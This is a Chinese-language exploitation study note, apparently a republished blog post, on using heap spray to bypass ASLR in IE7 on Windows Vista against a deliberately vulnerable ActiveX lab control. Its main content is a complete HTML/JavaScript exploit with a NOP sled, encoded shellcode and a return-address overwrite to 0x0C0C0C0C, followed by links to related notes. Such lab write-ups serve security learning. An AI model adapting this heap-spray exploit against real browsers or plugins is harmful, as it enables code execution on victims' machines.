漏洞學習筆記-019-利用HeapSpray攻擊ASLR

阿新 • • 發佈：2020-12-08

利用Heap Spray(堆噴射)技術來攻擊ASLR並定位shellcode

本文來源：Moeomu的部落格

原理

通過申請大量的記憶體，佔領記憶體中的0x0C0C0C0C的位置，並在這些記憶體中放置0x90和shellcode，最後控制程式轉入0x0C0C0C0C執行。只要運氣不要差到0x0C0C0C0C剛好位於shellcode中的某個位置，shellcode就可以成功執行

實驗

準備工作

環境：系統：Windows Vista SP0，DEP狀態：預設，瀏覽器：IE7

還是將之前用過的Vulner_AX.dll作為攻擊目標
VulnerAX.idl中CVulnerAXCtrl的類資訊的UUID：ACA3927C-6BD1-4B4E-8697-72481279AAEC

思想

我們利用Heap spray技術在記憶體中申請200個1MB的記憶體塊來對抗ASLR的隨機化處理
每個記憶體塊中包含著0x90填充和shellcode
Heap spray結束後我們會佔領0x0C0C0C0C附近的記憶體，我們只要控制程式轉入0x0C0C0C0C執行，在經過若干個0x90滑行之後就可以到達shellcode範圍並執行
test函式中存在一個典型的溢位漏洞，通過複製超長字串可以覆蓋函式返回地址
我們將函式返回地址覆蓋為0x0C0C0C0C，在函式執行返回執行後就會轉入我們申請的記憶體空間中

程式碼

<html>
<body>
<script>
    var nops = unescape("%u9090%u9090");
    var shellcode = "\u68fc\u0a6a\u1e38\u6368\ud189\u684f\u7432\u0c91\uf48b\u7e8d\u33f4\ub7db\u2b04\u66e3\u33bb\u5332\u7568\u6573\u5472\ud233\u8b64\u305a\u4b8b\u8b0c\u1c49\u098b\u698b\uad08\u6a3d\u380a\u751e\u9505\u57ff\u95f8\u8b60\u3c45\u4c8b\u7805\ucd03\u598b\u0320\u33dd\u47ff\u348b\u03bb\u99f5\ube0f\u3a06\u74c4\uc108\u07ca\ud003\ueb46\u3bf1\u2454\u751c\u8be4\u2459\udd03\u8b66\u7b3c\u598b\u031c\u03dd\ubb2c\u5f95\u57ab\u3d61\u0a6a\u1e38\ua975\udb33\u6853\u616B\u6F6F\u4D68\u7369\u8B61\u53c4\u5050\uff53\ufc57\uff53\uf857";
    while (nops.length < 0x100000)
        nops += nops;
    nops = nops.substring(0, 0x100000/2-32/2-4/2-2/2-shellcode.length);
    nops = nops + shellcode;
    var memory = new Array();
    for (var i = 0; i < 200; i++)
        memory[i] += nops;
</script>
<object classid="clsid:ACA3927C-6BD1-4B4E-8697-72481279AAEC" id="test"> </object>
<script>
    var s = "\u9090";
    while (s.length < 54)
    {
        s += "\u9090";
    }
    s += "\u0C0C\u0C0C";
    test.test(s);
</script>
</body>
</html>

結果

成功攻擊ASLR，如圖

漏洞學習筆記-019-利用HeapSpray攻擊ASLR

利用Heap Spray(堆噴射)技術來攻擊ASLR並定位shellcode 本文來源：Moeomu的部落格原理

漏洞學習筆記-016-利用可執行記憶體和.NET攻擊DEP

Ret2Libc之利用VirtualProtect和VirtualAlloc攻擊DEP攻擊DEP 本文來源：Moeomu的部落格利用可執行記憶體攻擊DEP

漏洞學習筆記-015-利用VirtualProtect和VirtualAlloc攻擊DEP

Ret2Libc之利用VirtualProtect和VirtualAlloc攻擊DEP攻擊DEP 本文來源：Moeomu的部落格利用VirtualProtect攻擊DEP

漏洞學習筆記-018-利用部分覆蓋定位

利用部分覆蓋定位shellcode 本文來源：Moeomu的部落格原理映像隨機化指示對映像載入基址的全兩個位元組隨機化處理，這樣做的後果是跳板始終可用，因此可以利用這一點去繞過ASLR

Windows漏洞學習筆記-007-堆溢位的利用

堆溢位的利用宣告：實驗環境為 Windows 2000 本文來源：Moeomu的部落格連結串列的拆卸

漏洞學習筆記-017-ASLR簡介

ASLR技術的介紹和簡單攻擊思路本文來源：Moeomu的部落格 ASLR技術簡介縱觀前面介紹的所有漏洞利用方法都有著一個共同的特徵：都需要確定一個明確的跳轉地址。無論是JMP ESP等通用跳板指令還是Ret2Libc使用的各指

漏洞學習筆記-013-SafeSEH簡介和簡單攻擊

SafeSEH簡介和簡單攻擊本文來源：Moeomu的部落格 SafeSEH簡介工作檢查異常處理鏈是否位於當前程式的棧中。如果不在當前棧中，程式將終止異常處理函式的呼叫。

Windows漏洞學習筆記-006-堆的入門

Windows的堆，從來都是一個亂糟糟的地方，管理方法也非常奇怪宣告：實驗環境為 Windows 2000

Windows漏洞學習筆記-009-Windows異常的深入

深入挖掘Windows異常處理，附帶一些其它的利用方法宣告：實驗環境為 Windows XP SP3

漏洞學習筆記-014-DEP的介紹

Windows的DEP保護和簡單的攻擊方法本文來源：Moeomu的部落格 DEP的介紹溢位攻擊的根源是未準確區分資料和程式碼，但是重新設計計算機結構是不太可能的事情，所以使用各種辦法去減緩溢位攻擊

漏洞學習筆記-020-SEHOP簡介

SEHOP的介紹和一點簡單攻擊本文來源：Moeomu的部落格簡介 SEHOP的核心任務就是檢查S.E.H鏈的完整性，在程式轉入異常處理前SEHOP會檢查S.E.H鏈上最後一個異常處理函式是否為系統固定的終極異常處理函式。如果是，

Python 反序列化漏洞學習筆記

參考文章一篇文章帶你理解漏洞之 Python 反序列化漏洞 Python Pickle/CPickle 反序列化漏洞

Python學習筆記：利用pd.assign新增一列

pandas.assign 的作用是直接向資料框物件新增一列。所新增的列名無需用引號括起來。

Springcloud學習筆記42--利用HttpClient實現服務A向服務B傳送Http請求

1.服務A傳送Http請求 1.1 在yml檔案中配置Http的相關引數 http: maxTotal: 100 defaultMaxPerRoute: 20

Xstream反序列化漏洞學習筆記

繼續用去年寫的筆記混點部落格kpi... 目錄 CVE-2013-7285 CVE-2020-26217 CVE-2021-21344 CVE-2021-21344<Xstream<CVE-2021-29505

【從入門到放棄系列學習筆記8】web應用安全基礎整理-SQL注入漏洞利用

一、SQL簡介　　結構化查詢語言（structured Query language），是一種特殊的程式語言，用於資料庫中的標準資料查詢。

某教程學習筆記（一）：08、MSSQL資料庫漏洞

你永遠不知道，愛你愛到發瘋的人，給你發過長篇大論的人，突然安靜下來，不再打擾你，他心裡經歷了怎樣的傷痛。。。

Maven專案學習筆記（四）SSM專案利用《form:form》標籤在Mysql資料庫中實現新增和修改資料

近期自己搞好了系統的新增、修改、條件查詢的功能了，折騰了幾天，主要是新增修改的業務判斷比較多，導致那個負責修改的控制器程式碼加註釋都170多行，真第一次遇見這種情況。最後還是能實現對應的功能了

PHP 反序列化漏洞入門學習筆記

參考文章： PHP反序列化漏洞入門 easy_serialize_php wp 實戰經驗丨PHP反序列化漏洞總結

Python基礎學習筆記（23）繼承類部分屬性的補充方法和函式利用 pickle 儲存物件

Python基礎學習（23）繼承類部分屬性的補充方法和函式利用 pickle 儲存物件一、今日大綱